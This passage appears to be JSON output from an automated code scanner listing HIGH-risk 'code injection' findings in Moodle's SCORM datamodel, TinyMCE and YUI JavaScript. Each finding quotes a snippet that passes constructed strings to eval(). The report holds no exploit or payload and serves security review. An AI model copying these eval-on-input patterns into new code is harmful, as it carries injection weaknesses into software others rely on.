found = true;\n }\n }\n return found;\n }\n", "vulnerId": "APPCUT:62:14366", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 68, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 1082, "positionInEndLine": 101, "startLineNumber": 1082, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " if ((parseInt(elementIndexes[i + 1]) > 0) && (elementIndexes[i + 1].charAt(0) == 0)) {\n // Index has a leading 0 (zero), this is not a number\n errorCode = \"351\";\n }\n parentelement = subelement + '.' + elementIndex;\n if ((typeof eval(parentelement) == \"undefined\") || (typeof eval(parentelement + '._count') == \"undefined\")) {\n errorCode = \"408\";\n } else {\n if (elementIndexes[i + 1] > eval(parentelement + '._count')) {\n errorCode = \"351\";\n diagnostic = \"Data Model Element Collection Set Out Of Order\";\n", "vulnerId": "APPCUT:62:14368", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 56, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 503, "positionInEndLine": 72, "startLineNumber": 503, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " errorCode = \"0\";\n if (Initialized) {\n if (element != \"\") {\n expression = new RegExp(CMIIndex,'g');\n elementmodel = String(element).replace(expression,'.n.');\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].mod') != 'r') {\n expression = new RegExp(eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].format'));\n value = value + '';\n matches = value.match(expression);\n if (matches != null) {\n", "vulnerId": "APPCUT:62:14355", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 32, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 290, "positionInEndLine": 86, "startLineNumber": 290, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " if (subelement.substr(0,14) == 'cmi.objectives') {\n eval(subelement + '.score = new Object();');\n eval(subelement + '.score._children = score_children;');\n eval(subelement + '.score.raw = \"\";');\n eval(subelement + '.score.min = \"\";');\n eval(subelement + '.score.max = \"\";');\n }\n if (subelement.substr(0,16) == 'cmi.interactions') {\n eval(subelement + '.objectives = new Object();');\n eval(subelement + '.objectives._count = 0;');\n eval(subelement + '.correct_responses = new Object();');\n", "vulnerId": "APPCUT:62:14361", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 342, "positionInEndLine": 81, "startLineNumber": 342, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " }\n if (subelement.substr(0,16) == 'cmi.interactions') {\n eval(subelement + '.objectives = new Object();');\n eval(subelement + '.objectives._count = 0;');\n eval(subelement + '.correct_responses = new Object();');\n eval(subelement + '.correct_responses._count = 0;');\n }\n }\n }\n element = subelement.concat('.' + elementIndexes[elementIndexes.length - 1]);\n }\n", "vulnerId": "APPCUT:62:14371", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 348, "positionInEndLine": 95, "startLineNumber": 348, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " eval(subelement + '.score.min = \"\";');\n eval(subelement + '.score.max = \"\";');\n }\n if (subelement.substr(0,16) == 'cmi.interactions') {\n eval(subelement + '.objectives = new Object();');\n eval(subelement + '.objectives._count = 0;');\n eval(subelement + '.correct_responses = new Object();');\n eval(subelement + '.correct_responses._count = 0;');\n }\n }\n }\n", "vulnerId": "APPCUT:62:14359", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 329, "positionInEndLine": 88, "startLineNumber": 329, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " if (typeof eval(subel1 + '.type') == \"undefined\") {\n errorCode = \"408\";\n } else {\n // Use cmi.interactions.n.type value to check the right //dataelement format\n var interactiontype = eval(subel1 + '.type');\n var interactioncount = eval(parentelement + '._count');\n // trap duplicate values, which is not allowed for type choice\n if (interactiontype == 'choice') {\n for (var i = 0; (i < interactioncount) && (errorCode == \"0\"); i++) {\n if (eval(parentelement + '.N' + i + '.pattern') == value) {\n errorCode = \"351\";\n", "vulnerId": "APPCUT:62:14358", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 79, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 718, "positionInEndLine": 106, "startLineNumber": 718, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/lib/editor/tinymce/tiny_mce/3.5.11/tiny_mce_src.js", "code": "\ttinymce.util.JSON = {\n\t\tserialize: serialize,\n\n\t\tparse: function(s) {\n\t\t\ttry {\n\t\t\t\treturn eval('(' + s + ')');\n\t\t\t} catch (ex) {\n\t\t\t\t// Ignore\n\t\t\t}\n\t\t}\n\n", "vulnerId": "APPCUT:62:14356", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 15, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 950, "positionInEndLine": 30, "startLineNumber": 950, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " expression = new RegExp(CMIIndex,'g');\n elementmodel = String(element).replace(expression,'.n.');\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].mod') != 'r') {\n elementstring = '&' + underscore(element) + '=' + escape(data[property]);\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].defaultvalue')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].defaultvalue') != data[property]) {\n datastring += elementstring;\n }\n } else {\n datastring += elementstring;\n", "vulnerId": "APPCUT:62:14367", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 40, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 496, "positionInEndLine": 107, "startLineNumber": 496, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": "\n if (typeof eval(subel1 + '.type') == \"undefined\") {\n errorCode = \"408\";\n } else {\n // Use cmi.interactions.n.type value to check the right //dataelement format\n var interactiontype = eval(subel1 + '.type');\n var interactioncount = eval(parentelement + '._count');\n // trap duplicate values, which is not allowed for type choice\n if (interactiontype == 'choice') {\n for (var i = 0; (i < interactioncount) && (errorCode == \"0\"); i++) {\n if (eval(parentelement + '.N' + i + '.pattern') == value) {\n", "vulnerId": "APPCUT:62:14363", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 78, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 717, "positionInEndLine": 96, "startLineNumber": 717, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/lib/yuilib/2in3/2.9.0/build/yui2-datasource/yui2-datasource-debug.js", "code": "Math.max(oFullResponse.lastIndexOf(\"]\"),oFullResponse.lastIndexOf(\"}\"));\n oFullResponse = oFullResponse.substring(0,arrayEnd+1);\n\n // Turn the string into an object literal...\n // ...eval is necessary here\n oFullResponse = eval(\"(\" + oFullResponse + \")\");\n\n }\n }\n }\n }\n", "vulnerId": "APPCUT:62:14364", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 1090, "positionInEndLine": 75, "startLineNumber": 1090, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " subelement = 'cmi';\n for (i = 1; i < elementIndexes.length - 1; i++) {\n elementIndex = elementIndexes[i];\n if (elementIndexes[i + 1].match(/^\\d+$/)) {\n if ((typeof eval(subelement + '.' + elementIndex)) == \"undefined\") {\n eval(subelement + '.' + elementIndex + ' = new Object();');\n eval(subelement + '.' + elementIndex + '._count = 0;');\n }\n if (elementIndexes[i + 1] == eval(subelement + '.' + elementIndex + '._count')) {\n eval(subelement + '.' + elementIndex + '._count++;');\n }\n", "vulnerId": "APPCUT:62:14365", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 321, "positionInEndLine": 102, "startLineNumber": 321, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " while ((i < elementIndexes.length) && (typeof eval(subelement) != \"undefined\")) {\n subelement += '.' + elementIndexes[i++];\n }\n if (subelement == element) {\n errorCode = \"0\";\n return eval(element);\n } else {\n errorCode = \"0\"; // Need to check if it is the right errorCode\n }\n } else {\n errorCode = eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].readerror');\n", "vulnerId": "APPCUT:62:14360", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 39, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 247, "positionInEndLine": 48, "startLineNumber": 247, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " i++;\n } else {\n subelement = subelement.concat('.' + elementIndex);\n }\n if ((typeof eval(subelement)) == \"undefined\") {\n eval(subelement + ' = new Object();');\n if (subelement.substr(0,14) == 'cmi.objectives') {\n eval(subelement + '.score = new Object();');\n eval(subelement + '.score._children = score_children;');\n eval(subelement + '.score.raw = \"\";');\n eval(subelement + '.score.min = \"\";');\n", "vulnerId": "APPCUT:62:14370", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 44, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 319, "positionInEndLine": 77, "startLineNumber": 319, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}]}, {"pageNumber": 2, "vulnerabilities": [{"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " if ((value >= ranges[0]) && (value <= ranges[1])) {\n eval(element + '=\"' + value + '\";');\n errorCode = \"0\";\n return \"true\";\n } else {\n errorCode = eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].writeerror');\n }\n } else {\n if (element == 'cmi.comments') {\n eval(element + '+=\"' + value + '\";');\n } else {\n", "vulnerId": "APPCUT:62:14255", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 56, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 351, "positionInEndLine": 121, "startLineNumber": 351, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " diagnostic = \"\";\n if ((Initialized) && (!Terminated)) {\n if (element != \"\") {\n var expression = new RegExp(CMIIndex,'g');\n var elementmodel = String(element).replace(expression,'.n.');\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].mod') != 'r') {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].format') != 'CMIFeedback') {\n expression = new RegExp(eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].format'));\n } else {\n // cmi.interactions.n.type depending format accept everything at this stage\n", "vulnerId": "APPCUT:62:14241", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 32, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 476, "positionInEndLine": 86, "startLineNumber": 476, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].mod') != 'w') {\n element = String(element).replace(expression, \"_$1.\");\n elementIndexes = element.split('.');\n subelement = 'cmi';\n i = 1;\n while ((i < elementIndexes.length) && (typeof eval(subelement) != \"undefined\")) {\n subelement += '.' + elementIndexes[i++];\n }\n if (subelement == element) {\n errorCode = \"0\";\n if (scormdebugging) {\n", "vulnerId": "APPCUT:62:14252", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 74, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 253, "positionInEndLine": 87, "startLineNumber": 253, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " }\n } else {\n errorCode = eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].writeerror');\n }\n } else {\n errorCode = eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].writeerror');\n }\n } else {\n errorCode = \"201\"\n }\n } else {\n", "vulnerId": "APPCUT:62:14248", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 40, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 390, "positionInEndLine": 105, "startLineNumber": 390, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " }\n if ((typeof eval(subelement)) == \"undefined\") {\n eval(subelement + ' = new Object();');\n if (subelement.substr(0,14) == 'cmi.objectives') {\n eval(subelement + '.score = new Object();');\n eval(subelement + '.score._children = score_children;');\n eval(subelement + '.score.raw = \"\";');\n eval(subelement + '.score.min = \"\";');\n eval(subelement + '.score.max = \"\";');\n }\n if (subelement.substr(0,16) == 'cmi.interactions') {\n", "vulnerId": "APPCUT:62:14242", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 339, "positionInEndLine": 99, "startLineNumber": 339, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " if ((typeof eval(subelement) != \"undefined\") && (eval(subelement) != null)) {\n errorCode = \"0\";\n if (scormdebugging) {\n LogAPICall(\"GetValue\", element, eval(element), 0);\n }\n return eval(element);\n } else {\n errorCode = \"403\";\n }\n } else {\n errorCode = \"301\";\n", "vulnerId": "APPCUT:62:14249", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 43, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 403, "positionInEndLine": 52, "startLineNumber": 403, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " elementIndexes = element.split('.');\n subelement = 'cmi';\n for (i = 1; i < elementIndexes.length - 1; i++) {\n elementIndex = elementIndexes[i];\n if (elementIndexes[i + 1].match(/^\\d+$/)) {\n if ((typeof eval(subelement + '.' + elementIndex)) == \"undefined\") {\n eval(subelement + '.' + elementIndex + ' = new Object();');\n eval(subelement + '.' + elementIndex + '._count = 0;');\n }\n if (elementIndexes[i + 1] == eval(subelement + '.' + elementIndex + '._count')) {\n eval(subelement + '.' + elementIndex + '._count++;');\n", "vulnerId": "APPCUT:62:14251", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 56, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 303, "positionInEndLine": 89, "startLineNumber": 303, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " }\n parentelement = subelement + '.' + elementIndex;\n if ((typeof eval(parentelement) == \"undefined\") || (typeof eval(parentelement + '._count') == \"undefined\")) {\n errorCode = \"408\";\n } else {\n if (elementIndexes[i + 1] > eval(parentelement + '._count')) {\n errorCode = \"351\";\n diagnostic = \"Data Model Element Collection Set Out Of Order\";\n }\n subelement = subelement.concat('.' + elementIndex + '.N' + elementIndexes[i + 1]);\n i++;\n", "vulnerId": "APPCUT:62:14244", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 76, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 506, "positionInEndLine": 103, "startLineNumber": 506, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " diagnostic = \"Data Model Element ID Already Exists\";\n }\n break;\n case 'cmi.interactions.n.id':\n if (elementIndexes[elementIndexes.length - 2] == eval(parentelement + '._count')) {\n eval(parentelement + '._count++;');\n eval(subelement + ' = new Object();');\n var subobject = eval(subelement);\n subobject.objectives = new Object();\n subobject.objectives._count = 0;\n }\n", "vulnerId": "APPCUT:62:14247", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 56, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 552, "positionInEndLine": 86, "startLineNumber": 552, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " }\n break;\n case 'cmi.interactions.n.correct_responses.n.pattern':\n if (typeof eval(parentelement) != \"undefined\") {\n // Use cmi.interactions.n.type value to check the right dataelement format\n if (elementIndexes[elementIndexes.length - 2] == eval(parentelement + '._count')) {\n var interactiontype = eval(String(parentelement).replace('correct_responses','type'));\n var interactioncount = eval(parentelement + '._count');\n // trap duplicate values, which is not allowed for type choice\n if (interactiontype == 'choice') {\n for (var i = 0; (i < interactioncount) && (errorCode == \"0\"); i++) {\n", "vulnerId": "APPCUT:62:14246", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 105, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 577, "positionInEndLine": 132, "startLineNumber": 577, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " return param;\n }\n\n function duplicatedID (element, parent, value) {\n var found = false;\n var elements = eval(parent + '._count');\n for (var n = 0; (n < elements) && (!found); n++) {\n if ((parent + '.N' + n + '.id' != element) && (eval(parent + '.N' + n + '.id') == value)) {\n found = true;\n }\n }\n", "vulnerId": "APPCUT:62:14243", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 27, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 1069, "positionInEndLine": 47, "startLineNumber": 1069, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " datastring += CollectData(data[property],parent + '.' + property);\n } else {\n var element = parent + '.' + property;\n var expression = new RegExp(CMIIndexStore,'g');\n var elementmodel = String(element).replace(expression,'.n.');\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"]')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].mod') != 'r') {\n var elementstring = '&' + underscore(element) + '=' + encodeURIComponent(data[property]);\n if ((typeof eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].defaultvalue')) != \"undefined\") {\n if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].defaultvalue') != data[property] || eval('typeof(datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].defaultvalue)') != typeof(data[property])) {\n datastring += elementstring;\n", "vulnerId": "APPCUT:62:14254", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 32, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 1183, "positionInEndLine": 86, "startLineNumber": 1183, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_12.js", "code": " return eval(element);\n } else {\n errorCode = \"0\"; // Need to check if it is the right errorCode\n }\n } else {\n errorCode = eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].readerror');\n }\n } else {\n childrenstr = '._children';\n countstr = '._count';\n if (elementmodel.substr(elementmodel.length - childrenstr.length,elementmodel.length) == childrenstr) {\n", "vulnerId": "APPCUT:62:14245", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 40, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 266, "positionInEndLine": 104, "startLineNumber": 266, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/aicc.js", "code": " if (eval('datamodel[\"' + scoid + '\"][\"' + elementmodel + '\"].mod') != 'w') {\n element = String(element).replace(expression, \"_$1.\");\n elementIndexes = element.split('.');\n subelement = 'cmi';\n i = 1;\n while ((i < elementIndexes.length) && (typeof eval(subelement) != \"undefined\")) {\n subelement += '.' + elementIndexes[i++];\n }\n if (subelement == element) {\n errorCode = \"0\";\n return eval(element);\n", "vulnerId": "APPCUT:62:14250", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 74, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 242, "positionInEndLine": 87, "startLineNumber": 242, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " break;\n case 'cmi.interactions.n.correct_responses.n.pattern':\n subel = subelement.split('.');\n subel1 = 'cmi.interactions.' + subel[2];\n\n if (typeof eval(subel1 + '.type') == \"undefined\") {\n errorCode = \"408\";\n } else {\n // Use cmi.interactions.n.type value to check the right //dataelement format\n var interactiontype = eval(subel1 + '.type');\n var interactioncount = eval(parentelement + '._count');\n", "vulnerId": "APPCUT:62:14253", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 63, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 713, "positionInEndLine": 82, "startLineNumber": 713, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}]}, {"pageNumber": 6, "vulnerabilities": [{"sourceFileName": "moodle/mod/scorm/datamodels/scorm_13.js", "code": " diagnostic = \"\";\n if ((Initialized) && (!Terminated)) {\n if (element != \"\") {\n var expression = new RegExp(CMIIndex,'g');\n var elementmodel = String(element).replace(expression,'.n.');\n if 